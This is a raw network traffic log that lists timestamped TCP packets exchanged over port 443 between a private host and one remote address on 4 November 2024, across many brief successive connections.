Nov 4, 2024 17:31:31.796823978 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.796988010 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.797002077 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.887727976 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.887995005 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.888108015 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.888264894 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.888286114 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.888297081 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.888303995 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.891479969 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.891514063 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.891592979 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.891696930 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.891716003 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.487426043 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.488276005 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.488286972 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.488744974 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.488750935 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.565821886 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.566643000 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.566656113 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.567106009 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.567111969 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.618247032 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.618343115 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.618407965 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.618614912 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.618614912 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.618628025 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.618637085 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.621685028 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.621699095 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.621794939 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.622005939 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.622016907 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.638782024 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.639442921 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.639456034 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.639996052 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.640000105 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.759815931 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.759912014 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.759988070 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.760219097 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.760229111 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.760267973 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.760274887 CET	443	49770	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.763381958 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.763427019 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.763520956 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.763762951 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.763778925 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.773942947 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.774010897 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.774074078 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.774203062 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.774203062 CET	49771	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.774213076 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.774220943 CET	443	49771	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.776484013 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.776518106 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:32.776602030 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.776768923 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:32.776782990 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.356360912 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.356796026 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.356807947 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.357269049 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.357274055 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.486861944 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.486941099 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.487034082 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.487169027 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.487181902 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.487191916 CET	49772	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.487196922 CET	443	49772	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.489773989 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.489811897 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.489906073 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.490186930 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.490200043 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.499495029 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.499886990 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.499902010 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.500345945 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.500349998 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.521899939 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.528594971 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.528614044 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.529048920 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.529055119 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.629527092 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.629599094 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.629653931 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.630022049 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.630038023 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.630048037 CET	49773	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.630054951 CET	443	49773	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.636820078 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.636857986 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.637022018 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.637238026 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.637259007 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.656011105 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.656280041 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.656330109 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.656366110 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.656387091 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.656404018 CET	49774	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.656409979 CET	443	49774	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.662477970 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.662513018 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:33.662689924 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.662847042 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:33.662861109 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.218576908 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.219335079 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.219342947 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.219805002 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.219809055 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.348082066 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.348177910 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.348261118 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.348437071 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.348437071 CET	49775	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.348453045 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.348458052 CET	443	49775	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.351063013 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.351099968 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.351278067 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.351337910 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.351346016 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.382313967 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.382810116 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.382821083 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.383114100 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.383271933 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.383282900 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.383410931 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.383436918 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.383735895 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.383743048 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.512646914 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.512732029 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.512811899 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.514760971 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.514859915 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.514906883 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.516455889 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.516470909 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.516482115 CET	49777	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.516489983 CET	443	49777	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.516972065 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.516994953 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.517009020 CET	49776	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.517015934 CET	443	49776	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.519716978 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.519718885 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.519742966 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.519745111 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.519843102 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.519963026 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.519964933 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.519974947 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:34.520009995 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:34.520015955 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.091967106 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.092833996 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.092853069 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.093307018 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.093314886 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.222563982 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.222652912 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.222732067 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.222973108 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.222973108 CET	49778	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.222995043 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.223006010 CET	443	49778	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.226234913 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.226279020 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.226350069 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.226484060 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.226500034 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.247997046 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.248512030 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.248531103 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.248959064 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.248965025 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.252778053 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.253082037 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.253094912 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.253413916 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.253417969 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.376347065 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.376554012 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.376610994 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.376915932 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.376934052 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.376945019 CET	49779	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.376950026 CET	443	49779	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.379442930 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.379473925 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.379643917 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.379877090 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.379889011 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.382165909 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.382339954 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.382405996 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.382463932 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.382463932 CET	49780	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.382472992 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.382488012 CET	443	49780	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.384819984 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.384877920 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.384938002 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.385088921 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.385107040 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.974457026 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.975296021 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.975323915 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:35.976165056 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:35.976175070 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.101490021 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.102050066 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.102062941 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.102679968 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.102684021 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.106893063 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.106957912 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.107022047 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.107203960 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.107218027 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.107233047 CET	49781	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.107239008 CET	443	49781	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.109880924 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.109915018 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.110014915 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.110152960 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.110168934 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.121541023 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.122000933 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.122009993 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.122443914 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.122448921 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.230338097 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.230741978 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.230818987 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.235229969 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.235248089 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.235275030 CET	49782	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.235285044 CET	443	49782	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.238313913 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.238333941 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.238434076 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.238584995 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.238593102 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.259500027 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.259584904 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.259655952 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.259799957 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.259814978 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.259845018 CET	49783	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.259851933 CET	443	49783	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.262319088 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.262356997 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.262433052 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.262568951 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.262581110 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.974819899 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.975486040 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.975518942 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.975951910 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.975959063 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.983896971 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.984431982 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.984450102 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:36.984870911 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:36.984879971 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.102323055 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.102410078 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.102507114 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.102684975 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.102706909 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.102721930 CET	49785	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.102729082 CET	443	49785	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.105325937 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.105366945 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.105495930 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.105606079 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.105623007 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.109582901 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.109962940 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.109978914 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.110382080 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.110389948 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.111962080 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.112138987 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.112205029 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.112241030 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.112256050 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.112277031 CET	49786	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.112283945 CET	443	49786	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.114670038 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.114711046 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.114803076 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.114959002 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.114975929 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.239639997 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.239844084 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.239912033 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.240032911 CET	49784	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.240051031 CET	443	49784	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.309968948 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.310025930 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.310345888 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.310345888 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.310384989 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.848468065 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.848953962 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.848969936 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.849735975 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.849742889 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.850383043 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.850706100 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.850719929 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.851083994 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.851089954 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.975920916 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.976032972 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.976097107 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.976231098 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.976250887 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.976262093 CET	49788	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.976268053 CET	443	49788	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.979156971 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.979187965 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.979265928 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.979403973 CET	49790	443	192.168.2.5	13.107.246.45
